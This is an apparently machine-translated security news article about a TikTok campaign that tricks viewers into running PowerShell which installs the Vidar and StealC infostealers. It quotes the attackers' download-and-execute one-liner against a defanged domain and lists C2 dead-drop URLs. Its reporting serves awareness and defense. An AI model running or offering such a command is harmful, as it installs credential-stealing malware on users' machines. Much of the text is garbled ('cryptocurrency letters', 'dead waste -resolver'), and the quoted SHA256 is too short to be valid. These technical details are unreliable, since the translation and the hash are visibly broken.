Hackers who use the TIKTOK videos trends to deliver Vidar & Stealc Malware

In a concerned development that emphasizes the developing tactics of threat actors, cyber criminal have started to take advantage of the popularity of Tiktok in order to distribute sophisticated malware.

This new campaign expressly delivers Vidar and Stealc Infostaler by temporarily tempting users under the guise of activating legitimate software or unlocking premium functions for applications such as Windows OS, Microsoft Office, Capcut and Spotify.

In contrast to conventional methods for the distribution distribution of malware based on endangered websites or phishing -e emails, this attack vector fully uses social engineering via video content.

The threat actors create faceless videos that were potentially generated with AI tools and offer users step-by-step instructions so that users can easily install malware on their own systems.

This approach is particularly insidious, since it does not lower a malicious code for security solutions for recognizing all implementable content that is visually and aural on the platform itself.

Trend Micro researchers identified several Tikok accounts that are involved in this campaign, including @Gitallowed, @zane.houghton, @allaivo2, @sysglow.wow, @alexfixpc and @digitaldreams771.

Your investigation showed that some videos have received significant applications, with a certain video over 20,000 likes, 100 comments and about 500,000 views.

This widespread exposure shows the potential effects of the campaign and shows how the algorithmic range of Tikkok can increase malicious content.

The consequences for the victims are serious, as this information can be selected by steal sensitive data, steal login information and impair business systems.

After installation, the malware produces communication with command and control servers and enables the attackers to harvest valuable information from compromised devices.

This is a significant threat to both individual users and organizations, since stolen login information can lead to acquisitions for account, financial fraud and further network penetration.

Infection mechanism and technical analysis

The infection chain begins when users follow the video instructions to open PowerShell (by pressing Windows+R and entering “PowerShell”) and then carry out a similar command as:-

iex (irm https://allaivo[.]me/spotify)

This harmless-looking command invites you to a remote script and leads out (SHA256: B8D9821A4777095867AEB2038C464C59ED31A4C7413F768F2E14D3886), which initiates the infection process.

When executing, the script creates hidden directories in the user's Appdata and Localappdata folders and then adds these positions to the Windows Defender exclusion list – a sophisticated alternative technology that helps the malware to avoid detection.

The malware then continues to load additional payloads, including the Vidar and StealC information.

These malware variants are particularly dangerous because they aim at sensitive information, including stored passwords, cryptocurrency letters and authentication -cookies.

After installation, the malware connects to various command and control servers, including abused legitimate services.

Vidar, for example, uses steamprofiles (HXXPS: ​​// SteamCommunity[.]com/profile/7656119846773220) and telegram channels (HXXPS: ​​// T[.]Me/v00rd) as a “dead waste -resolver” to hide its actual C&C infrastructure -a technique that makes the persecution and disorder more difficult.

What makes this campaign particularly effective is how it combines social engineering with technical exploitation.

By appearing the videos as helpful tutorials for access to premium functions of the popular software, the videos build up trust with spectators, who then willingly carry out the commands that affect their systems.

This makes a significant development on social media that demonstrates how threat players continue to adapt their tactics to use the user behavior and to avoid traditional security controls.

This campaign demonstrates the further developing nature of social engineering attacks and the need for increased security consciousness in relation to social media content.

Users should maintain healthy skepticism about undesirable technical instructions, in particular those that affect PowerShell commands, regardless of how legitimate or helpful the source can appear.

Use a deep threat analysis for a faster reaction -> equip your SOC team -> Get additional 𝗦𝗮𝗻𝗱𝗯𝗼𝘅 𝗹𝗶𝗰𝗲𝗻𝘀𝗲𝘀 free of charge